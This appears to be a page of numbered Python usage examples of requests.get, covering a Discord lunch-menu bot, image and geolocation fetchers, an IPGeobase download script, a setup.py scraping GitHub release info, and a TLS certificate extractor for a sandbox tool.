    for day_div in soup.find_all("div", {"class": "day"}):
        dayname = day_div.find("span", {"class": "dayname"}).text.title()
        day_lines = ["__" + dayname + "__:"]
        for lunch in day_div.find_all("span", {"class": "lunch"}):
            day_lines.append(lunch.text)
        week_menu.append(day_lines)

    letter = ""
    if len(arguments) == 0:
        today = datetime.today().weekday()
        for day_index, day_lines in enumerate(week_menu):
            if today == day_index and day_index < 5:
                # Today's menu, bolded.
                letter += "**" + "\n".join(
                    day_lines
                ) + "**" + "\n\n__{}ao week__ for the whole week!".format(
                    starter)
            elif today >= 5 and day_index == 5:
                # Weekend: show next Monday's menu instead (not bolded).
                letter += "\n".join(
                    day_lines
                ) + "\n\nThis is for the next weeks mondays food!\n__{}ao week__ for the whole week!".format(
                    starter)
    else:
        # Whole week requested: dump every day, separating next week's part.
        for day_index, day_lines in enumerate(week_menu):
            if day_index == 5:
                letter += "**=====================\n\n**"
            letter += "\n".join(day_lines) + "\n\n"

    # Only send when something was collected.
    if not letter == "":
        await client.send_message(message.channel, letter)
Пример #28
0
def get_image(url):
    """Download the image at *url*; fall back to the default image on any error.

    Returns whatever ``bytes_to_image`` produces from the response body, or
    ``default_image()`` when the download or conversion fails.
    """
    from image_converter import bytes_to_image, default_image
    try:
        return bytes_to_image(rget(url).content)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # still propagate instead of being swallowed by the fallback.
        return default_image()
Пример #29
0
def _fetch_ipstack(address: str) -> dict:
    """Fetch geolocation data for *address* from ipstack as a parsed dict."""
    try:
        response = rget(_get_url(address))
        return response.json()
    except ConnectionError:
        # Re-raise with the module's user-facing unavailability message.
        raise ConnectionError(IPSTACK_UNAVAILAVLE)
Пример #30
0
#!/usr/bin/env python

from requests import get as rget
from zipfile import ZipFile
from StringIO import StringIO
from base64 import b64encode
from os import path as os_path


def error(text):
    """Write *text* to stderr and terminate the script with exit status 1.

    Fix: the surrounding script never imports ``sys``, so the original body
    raised NameError instead of printing; import it locally here.
    """
    import sys
    sys.stderr.write(text + "\n")
    # ``raise SystemExit`` is equivalent to exit(1) but does not depend on
    # the ``site``-installed ``exit`` helper being present.
    raise SystemExit(1)

# Download the IPGeobase database dump (note: this is a Python 2 script —
# it relies on the StringIO module imported above).
archive = rget("http://ipgeobase.ru/files/db/Main/geo_files.zip")
if archive.status_code != 200:
    error("IPGeobase no answer: %s" % archive.status_code)

# Open the downloaded ZIP archive entirely in memory.
extracteddata = ZipFile(StringIO(archive.content))

# Both expected data files must be present in the archive.
filelist = extracteddata.namelist()
if "cities.txt" not in filelist:
    error("cities.txt not downloaded")
if "cidr_optim.txt" not in filelist:
    error("cidr_optim.txt not downloaded")

database = {}

# Build a lookup from the two-column regions.tsv next to this script.
# NOTE(review): [::-1] swaps each row's two TSV columns before dict() pairs
# them — presumably mapping region name -> region id; confirm against the
# actual column order of regions.tsv.
REGIONS = dict(l.decode("utf8").rstrip().split("\t")[::-1]
               for l in open(
                   os_path.dirname(os_path.realpath(__file__)) +
                   "/regions.tsv").readlines())
Пример #31
0
def get_install_requires(filename):
    """Return every line of *filename* with surrounding whitespace stripped."""
    with open(filename, 'r') as req_file:
        stripped = [line.strip() for line in req_file.readlines()]
    return stripped

# Project homepage and its latest-release page on GitHub.
url = 'https://github.com/GoodManWEN/aiohttp-jwtplus'
release = f'{url}/releases/latest'
# Browser-like request headers so GitHub serves the regular HTML pages.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
    "Connection": "keep-alive",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8"
}

# Scrape the repository description from the <meta name="description"> tag.
# Fix: ``headers`` must be passed as the keyword argument ``headers=`` —
# positionally it lands in requests.get's ``params`` slot and is sent as a
# query string rather than as HTTP headers.
html = BeautifulSoup(rget(url, headers=headers).text, 'lxml')
description = html.find('meta', {'name': 'description'}).get('content')
# Scrape the latest release tag from the release page header.
html = BeautifulSoup(rget(release, headers=headers).text, 'lxml')
version = html.find('div', {'class': 'release-header'}).find('a').text
logger.info(f"description: {description}")
logger.info(f"version: {version}")

# Load the README to reuse as the long description.
with open('README.md', 'r', encoding='utf-8') as f:
    long_description_lines = f.readlines()

# Copy of the README wrapped in raw-docstring markers so it can be injected
# verbatim as a module docstring.
long_description_lines_copy = long_description_lines[:]
long_description_lines_copy.insert(0, 'r"""\n')
long_description_lines_copy.append('"""\n')

# update __init__ docs
#!/usr/bin/env python

from requests import get as rget
from zipfile import ZipFile
from StringIO import StringIO
from base64 import b64encode
from os import path as os_path


def error(text):
    """Write *text* to stderr and terminate the script with exit status 1.

    Fix: the surrounding script never imports ``sys``, so the original body
    raised NameError instead of printing; import it locally here.
    """
    import sys
    sys.stderr.write(text + "\n")
    # ``raise SystemExit`` is equivalent to exit(1) but does not depend on
    # the ``site``-installed ``exit`` helper being present.
    raise SystemExit(1)

# Download the IPGeobase database dump (note: this is a Python 2 script —
# it relies on the StringIO module imported above).
archive = rget("http://ipgeobase.ru/files/db/Main/geo_files.zip")
if archive.status_code != 200:
    error("IPGeobase no answer: %s" % archive.status_code)

# Open the downloaded ZIP archive entirely in memory.
extracteddata = ZipFile(StringIO(archive.content))

# Both expected data files must be present in the archive.
filelist = extracteddata.namelist()
if "cities.txt" not in filelist:
    error("cities.txt not downloaded")
if "cidr_optim.txt" not in filelist:
    error("cidr_optim.txt not downloaded")

database = {}

# Build a lookup from the two-column regions.tsv next to this script.
# NOTE(review): [::-1] swaps each row's two TSV columns before dict() pairs
# them — presumably mapping region name -> region id; confirm against the
# actual column order of regions.tsv.
REGIONS = dict(l.decode("utf8").rstrip().split("\t")[::-1]
               for l in open(
                   os_path.dirname(os_path.realpath(__file__)) +
                   "/regions.tsv").readlines())
Пример #33
0
def get_cert(parsed, extracted_table):
    """Capture the TLS certificate of ``parsed['buffer']`` and record it.

    Hooks urllib3's ``VerifiedHTTPSConnection.connect`` so the peer
    certificate is stashed in the module-level global ``X509`` during a
    throwaway GET request, then extracts subject, issuer, extensions and
    digests into ``extracted_table`` (an object with an ``insert`` method —
    presumably a TinyDB table; confirm against the caller).

    NOTE(review): the connect hook is never restored, so every later HTTPS
    connection in this process keeps overwriting the global — verify that
    this is intended.
    """
    try:
        # Short OpenSSL subject/issuer component codes -> readable names.
        mapped = {
            b'CN': b'Common Name',
            b'OU': b'Organizational Unit',
            b'O': b'Organization',
            b'L': b'Locality',
            b'ST': b'State Or Province Name',
            b'C': b'Country Name'
        }
        original_connect = VerifiedHTTPSConnection.connect

        def hooked_connect(self):
            # Run the real connect, then grab the negotiated peer cert.
            global X509
            original_connect(self)
            X509 = self.sock.connection.get_peer_certificate()

        VerifiedHTTPSConnection.connect = hooked_connect
        headers = {'User-Agent': parsed['useragent_mapped']}
        # Trigger a connection (optionally through a proxy) purely for the
        # side effect of populating the X509 global; the response is unused.
        if parsed['use_proxy']:
            proxies = {'http': parsed['proxy'], 'https': parsed['proxy']}
            rget(parsed['buffer'], proxies=proxies, headers=headers, timeout=2)
        else:
            rget(parsed['buffer'], headers=headers, timeout=2)
        List_ = {}
        List_['Subjects'] = []
        for subject in X509.get_subject().get_components():
            try:
                List_['Subjects'].append({
                    mapped[subject[0]].decode('utf-8'):
                    subject[1].decode('utf-8')
                })
            except BaseException:
                # Skip components with codes not covered by ``mapped``.
                pass
        List_['Subject Hash'] = X509.get_subject().hash()
        List_['Issuer'] = []
        for issuer in X509.get_issuer().get_components():
            try:
                List_['Issuer'].append({
                    mapped[issuer[0]].decode('utf-8'):
                    issuer[1].decode('utf-8')
                })
            except BaseException:
                pass
        List_['Issuer Hash'] = X509.get_issuer().hash()
        List_['Extensions'] = []
        # One {short-name: string-form} entry per X.509v3 extension.
        for extension in range(X509.get_extension_count()):
            List_['Extensions'].append({
                X509.get_extension(extension).get_short_name().decode('utf-8'):
                X509.get_extension(extension).__str__()
            })
        List_['Expired'] = X509.has_expired()
        List_['Valid From'] = X509.get_notBefore().decode('utf-8')
        List_['Valid Until'] = X509.get_notAfter().decode('utf-8')
        List_['Signature Algorithm'] = X509.get_signature_algorithm().decode(
            'utf-8')
        List_['Serial Number'] = X509.get_serial_number()
        # Fingerprints over the DER-encoded certificate, several algorithms.
        List_['MD5 Digest'] = X509.digest('md5').decode('utf-8')
        List_['SHA1 Digest'] = X509.digest('sha1').decode('utf-8')
        List_['SHA224 Digest'] = X509.digest('sha224').decode('utf-8')
        List_['SHA256 Digest'] = X509.digest('sha256').decode('utf-8')
        List_['SHA384 Digest'] = X509.digest('sha384').decode('utf-8')
        List_['SHA512 Digest'] = X509.digest('sha512').decode('utf-8')
        extracted_table.insert({'Certificate': List_})
        print("[SandBox] extracted certificate")
    except BaseException:
        # Best-effort sandbox probe: any failure is reported, not raised.
        print("[SandBox] get_cert failed")